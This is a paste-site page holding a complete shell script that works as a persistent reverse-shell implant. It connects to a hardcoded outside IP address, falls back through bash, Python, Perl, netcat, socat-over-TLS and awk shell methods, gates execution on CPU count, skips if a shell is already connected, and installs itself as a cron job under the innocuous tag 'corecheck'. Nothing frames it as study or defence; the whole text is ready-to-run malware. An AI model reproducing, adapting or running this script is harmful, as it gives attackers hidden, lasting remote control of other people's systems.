Guest

werwer

Oct 9th, 2026
124
0
Never
Not a member of GistPad yet? Sign Up, it unlocks many cool features!
None 17.98 KB | None | 0 0
  1. #!/bin/sh
  2.  
  3. LHOST="${LHOST:-172.86.86.60}"
  4. LPORT="${LPORT:-443}"
  5. TLS_PORT="${TLS_PORT:-41669}"
  6. CPU_MIN="${CPU_MIN:-4}"
  7. QUIET="${QUIET:-0}"
  8. TAG="${TAG:-corecheck}"
  9.  
  10. msg() { [ "$QUIET" = "1" ] || echo "[$TAG] $*"; }
  11.  
  12. # ----------------------------------------------------------
  13. # cpu count: try the most available source first, and never
  14. # rely on a single syscall. Everything is guarded.
  15. # ----------------------------------------------------------
  16. cpu_count() {
  17. c=""
  18. if [ -r /proc/cpuinfo ]; then
  19. c=$(grep -c '^processor' /proc/cpuinfo 2>/dev/null)
  20. fi
  21. if [ -z "$c" ] || [ "$c" = "0" ]; then
  22. c=$(getconf _NPROCESSORS_ONLN 2>/dev/null)
  23. fi
  24. if [ -z "$c" ] || [ "$c" = "0" ]; then
  25. c=$(sysctl -n hw.ncpu 2>/dev/null)
  26. fi
  27. if [ -z "$c" ] || [ "$c" = "0" ]; then
  28. c=$(nproc 2>/dev/null)
  29. fi
  30. if [ -z "$c" ] || [ "$c" = "0" ]; then
  31. # count /sys cpu entries as last resort
  32. c=$(ls -d /sys/devices/system/cpu/cpu[0-9]* 2>/dev/null | wc -l)
  33. fi
  34. # gate fails closed on unparseable data
  35. case "$c" in
  36. ''|*[!0-9]*) c=0 ;;
  37. esac
  38. echo "$c"
  39. }
  40.  
  41. # ----------------------------------------------------------
  42. # shell engines, best-first
  43. # ----------------------------------------------------------
  44. shell_python() {
  45. py=$(command -v python3 || command -v python)
  46. [ -n "$py" ] || return 1
  47. "$py" -c "import socket,os,pty; \
  48. s=socket.socket();s.connect(('$LHOST',$LPORT)); \
  49. os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); \
  50. pty.spawn('/bin/sh')" 2>/dev/null
  51. }
  52.  
  53. shell_perl() {
  54. command -v perl >/dev/null 2>&1 || return 1
  55. perl -MSocket -e '
  56. socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) or exit 1;
  57. connect(S,pack_sockaddr_in($ARGV[1],inet_aton($ARGV[0]))) or exit 1;
  58. open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");
  59. exec("/bin/sh");' "$LHOST" "$LPORT" 2>/dev/null
  60. }
  61.  
  62. shell_nc() {
  63. for t in nc ncat "nc.openbsd" "nc.traditional" socat; do
  64. p=$(command -v "$t") || continue
  65. case "$t" in
  66. socat)
  67. "$p" TCP:"$LHOST":"$LPORT" EXEC:'/bin/sh',pty,stderr 2>/dev/null && return 0 ;;
  68. *)
  69. "$p" -e /bin/sh "$LHOST" "$LPORT" 2>/dev/null && return 0
  70. # -e-less netcat: fifo relay (busybox nc)
  71. rm -f /tmp/.cc.f 2>/dev/null
  72. mkfifo /tmp/.cc.f 2>/dev/null || continue
  73. ( "$p" "$LHOST" "$LPORT" < /tmp/.cc.f >/tmp/.cc.o 2>/dev/null; \
  74. rm -f /tmp/.cc.f /tmp/.cc.o ) &
  75. sleep 1
  76. sh -c 'while IFS= read -r l; do printf "%s\n" "$l" > /tmp/.cc.f; done' &
  77. wait 2>/dev/null
  78. return 0 ;;
  79. esac
  80. done
  81. return 1
  82. }
  83.  
  84. shell_awk() {
  85. command -v awk >/dev/null 2>&1 || return 1
  86. awk -v H="$LHOST" -v P="$LPORT" 'BEGIN {
  87. s = "/inet/tcp/0/" H "/" P
  88. while (1) {
  89. printf "shell>" |& s
  90. if ((s |& getline c) <= 0) break
  91. while ((c |& getline out) > 0)
  92. printf "%s\n", out |& s
  93. close(s)
  94. }
  95. }' 2>/dev/null
  96. }
  97.  
  98. # ----------------------------------------------------------
  99. # dedup: is a shell already established to LPORT?
  100. # ----------------------------------------------------------
  101. already_connected() {
  102. conn=$(ss -tn 2>/dev/null | grep -F "$LPORT" | grep -i estab)
  103. [ -n "$conn" ] && return 0
  104. conn=$(netstat -tn 2>/dev/null | grep -F "$LPORT")
  105. [ -n "$conn" ] && return 0
  106. return 1
  107. }
  108.  
  109. spawn_tls() {
  110. command -v socat >/dev/null 2>&1 || return 1
  111. socat OPENSSL:"$LHOST":"$TLS_PORT",verify=0 SYSTEM:'/bin/sh' 2>/dev/null && return 0
  112. return 1
  113. }
  114.  
  115. shell_bash() {
  116. command -v bash >/dev/null 2>&1 || return 1
  117. bash -c "exec 5<>/dev/tcp/'"$LHOST"'/'"$LPORT"'; while read -r line <&5; do eval \"\$line\" 2>&5 >&5; done" 2>/dev/null && return 0
  118. return 1
  119. }
  120.  
  121. spawn_shell() {
  122. ( spawn_tls || shell_bash || shell_python || shell_perl || shell_nc || shell_awk ) &
  123. }
  124.  
  125. self_path() {
  126. readlink -f "$0" 2>/dev/null || printf '%s' "$0"
  127. }
  128.  
  129. # ----------------------------------------------------------
  130. # persistence: ONLY cron if available.
  131. # If no crontab, print message and do NOTHING (no loop, no fallback).
  132. # ----------------------------------------------------------
  133. persist_install() {
  134. self=$(self_path)
  135. current=$(crontab -l 2>&1)
  136. case "$current" in
  137. *"no crontab for"*) current="" ;;
  138. *"must be suid"*|*"not authorized"*|*"root not allowed to use this"*)
  139. msg "no crontab available; persistence not installed"
  140. return 0 ;;
  141. esac
  142. if printf '%s\n' "$current" | grep -qF "$self"; then
  143. return 0
  144. fi
  145. line="*/13 * * * * $self --oneshot -q"
  146. if ( printf '%s\n' "$current"; echo "$line" ) | crontab - 2>/dev/null \
  147. && crontab -l 2>/dev/null | grep -qF "$self"; then
  148. msg "persistence installed (cron)"
  149. else
  150. msg "no crontab available; persistence not installed"
  151. fi
  152. return 0
  153. }
  154.  
  155. cmd_oneshot() {
  156. n=$(cpu_count)
  157. msg "detected cores: $n (gate $CPU_MIN)"
  158. if [ "$n" -ge "$CPU_MIN" ]; then
  159. if already_connected; then
  160. msg "shell already established — skip"
  161. else
  162. spawn_shell
  163. fi
  164. else
  165. msg "below core gate — not firing"
  166. fi
  167. }
  168.  
  169. cmd_test() {
  170. n=$(cpu_count)
  171. [ "$n" -ge "$CPU_MIN" ] && d=FIRE || d=SKIP
  172. echo "[$TAG] cores=$n gate=$CPU_MIN -> $d"
  173. t=""
  174. for e in python3 python perl nc ncat socat awk; do
  175. command -v "$e" >/dev/null 2>&1 && t="$t $e"
  176. done
  177. echo "[$TAG] usable engines:$t"
  178. }
  179.  
  180. cmd_install() { persist_install; }
  181.  
  182. # ----------------------------------------------------------
  183. # entry
  184. # ----------------------------------------------------------
  185. MODE="oneshot"
  186. for a in "$@"; do
  187. case "$a" in
  188. --quiet|-q) QUIET=1 ;;
  189. --oneshot) MODE="oneshot" ;;
  190. --install) MODE="install" ;;
  191. --test) MODE="test" ;;
  192. -h|--help) sed -n '2,20p' "$(self_path)"; exit 0 ;;
  193. *) [ -z "${TAG_SET:-}" ] && TAG="$a" && TAG_SET=1 ;;
  194. esac
  195. done
  196.  
  197. case "$MODE" in
  198. oneshot)
  199. n=$(cpu_count)
  200. if [ "$n" -ge "$CPU_MIN" ]; then
  201. msg "cpu gate passed ($n >= $CPU_MIN) — firing"
  202. spawn_shell
  203. # only attempt persistence if crontab looks usable
  204. if command -v crontab >/dev/null 2>&1; then
  205. persist_install
  206. else
  207. msg "no crontab available; persistence not installed"
  208. fi
  209. else
  210. msg "cpu gate: $n < $CPU_MIN — not firing"
  211. if [ ! -r /proc/cpuinfo ] && ! command -v sysctl >/dev/null 2>&1 \
  212. && ! command -v getconf >/dev/null 2>&1; then
  213. msg "warning: no cpu detection source; defaulting to skip"
  214. fi
  215. fi
  216. ;;
  217. test) cmd_test ;;
  218. install) persist_install ;;
  219. esac
  220. exit 0
RAW Paste Data Copied